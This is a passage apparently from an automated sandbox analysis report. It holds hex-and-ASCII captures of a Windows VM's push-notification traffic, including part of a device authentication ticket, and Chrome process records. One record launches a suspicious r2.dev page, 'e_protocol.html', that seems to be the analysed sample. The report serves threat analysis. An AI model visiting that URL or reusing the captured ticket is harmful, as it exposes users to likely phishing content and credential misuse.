                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: T0RBwX6SG0yZJgUh.3Context: 29c3509846f3fdd9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:21 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:21 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4e 37 61 65 35 6b 48 46 72 30 79 59 4d 62 44 49 56 4d 6f 73 6e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: N7ae5kHFr0yYMbDIVMosnA.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      6192.168.2.64992340.115.3.253443
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:40 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6f 6d 6b 48 4d 74 30 6a 5a 55 32 35 43 45 79 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 38 37 31 64 30 66 35 66 36 30 64 34 33 62 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: omkHMt0jZU25CEyv.1Context: 8b871d0f5f60d43b
                      2025-01-15 00:44:40 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:40 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6f 6d 6b 48 4d 74 30 6a 5a 55 32 35 43 45 79 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 38 37 31 64 30 66 35 66 36 30 64 34 33 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4c 7a 37 45 33 4a 38 72 59 47 63 6c 55 61 59 78 45 6f 37 32 73 73 67 6a 4c 45 62 47 35 37 4e 46 66 66 4b 64 32 47 55 6a 47 69 51 7a 58 70 68 4c 55 32 53 63 44 55 61 4f 32 35 41 43 44 79 67 4e 30 62 66 64 66 45 59 36 32 51 5a 6b 72 6a 42 5a 58 69 65 53 77 4c 6a 63 76 50 31 39 42 54 39 65 72 51 2b 4e 4d 4d 38 57 74 51 61 76
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: omkHMt0jZU25CEyv.2Context: 8b871d0f5f60d43b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:40 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6f 6d 6b 48 4d 74 30 6a 5a 55 32 35 43 45 79 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 38 37 31 64 30 66 35 66 36 30 64 34 33 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: omkHMt0jZU25CEyv.3Context: 8b871d0f5f60d43b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:40 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:40 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6e 75 66 70 61 4d 67 36 39 6b 43 6f 73 69 65 66 75 51 34 61 4a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: nufpaMg69kCosiefuQ4aJg.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      7192.168.2.65000540.115.3.253443
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:45:04 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2f 69 67 75 34 67 67 52 38 30 71 46 41 6f 62 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 36 63 31 33 30 36 31 33 33 65 33 30 38 38 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: /igu4ggR80qFAobI.1Context: 646c1306133e3088
                      2025-01-15 00:45:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:45:04 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 2f 69 67 75 34 67 67 52 38 30 71 46 41 6f 62 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 36 63 31 33 30 36 31 33 33 65 33 30 38 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4c 7a 37 45 33 4a 38 72 59 47 63 6c 55 61 59 78 45 6f 37 32 73 73 67 6a 4c 45 62 47 35 37 4e 46 66 66 4b 64 32 47 55 6a 47 69 51 7a 58 70 68 4c 55 32 53 63 44 55 61 4f 32 35 41 43 44 79 67 4e 30 62 66 64 66 45 59 36 32 51 5a 6b 72 6a 42 5a 58 69 65 53 77 4c 6a 63 76 50 31 39 42 54 39 65 72 51 2b 4e 4d 4d 38 57 74 51 61 76
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: /igu4ggR80qFAobI.2Context: 646c1306133e3088<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:45:04 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2f 69 67 75 34 67 67 52 38 30 71 46 41 6f 62 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 36 63 31 33 30 36 31 33 33 65 33 30 38 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: /igu4ggR80qFAobI.3Context: 646c1306133e3088<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:45:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2025-01-15 00:45:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 30 33 62 69 51 6a 67 47 4a 30 61 62 72 77 68 7a 74 66 34 75 79 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: 03biQjgGJ0abrwhztf4uyg.0Payload parsing failed.


                      020406080s020406080100

                      Click to jump to process

                      020406080s0.0050100MB

                      Click to jump to process

                      Target ID:1
                      Start time:19:43:54
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:19:43:58
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:4
                      Start time:19:44:04
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html"
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly